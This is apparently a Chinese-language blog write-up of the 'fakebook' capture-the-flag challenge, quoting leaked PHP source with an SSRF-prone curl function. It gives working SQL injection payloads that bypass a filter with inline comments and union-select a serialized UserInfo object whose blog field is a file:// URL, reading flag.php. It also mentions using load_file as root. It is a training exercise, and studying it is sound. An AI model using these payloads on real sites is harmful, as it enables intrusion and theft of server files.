攻防世界-fakebook-网鼎杯2018

访问 /robots.txt 发现备份文件,下载下来得到源码。

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

显然 get() 方法里面存在一个 SSRF 漏洞,传入的参数值是当前用户的博客。

同时在 view.php 存在 sql 注入

先尝试sql注入看看能不能读取数据库信息吧。经过测试应该是个数字型的注入,不需要引号闭合。

测列数:

一共是4列,接下来去联合注入,但是存在过滤。

使用内联注释成功绕过:

1/**/union/**/select/**/2,3,4,5

从回显的信息来看应该是将查询到的blog的内容传入getBlogContents方法,幸运地是这个查询的内容我们可控,只要联合查询字符串就好,而不是数字。那接下来的思路就是查询一个字符串,然后这个字符串传入 getBlogContents 方法,然后传递到get 方法,最后通过 ssrf 读取文件。

note:细节的一点是回显信息中有一个反序列化,合理的猜测是数据库里面存的是序列化后的数据,取出来再反序列化,我们试着把blog字段根据源码中的UserInfo类序列化然后查询。这里直接一步到位读取flag

-1/**/union/**/select/**/2,3,4,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

以上的手法是官方wp的操作,然而完全不用这么麻烦,查询当前用户就可以知道我们是root。紧接着尝试load_file发现可以读取到view.php,那么直接在同目录下以及根目录下尝试一会就可以读到flag了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值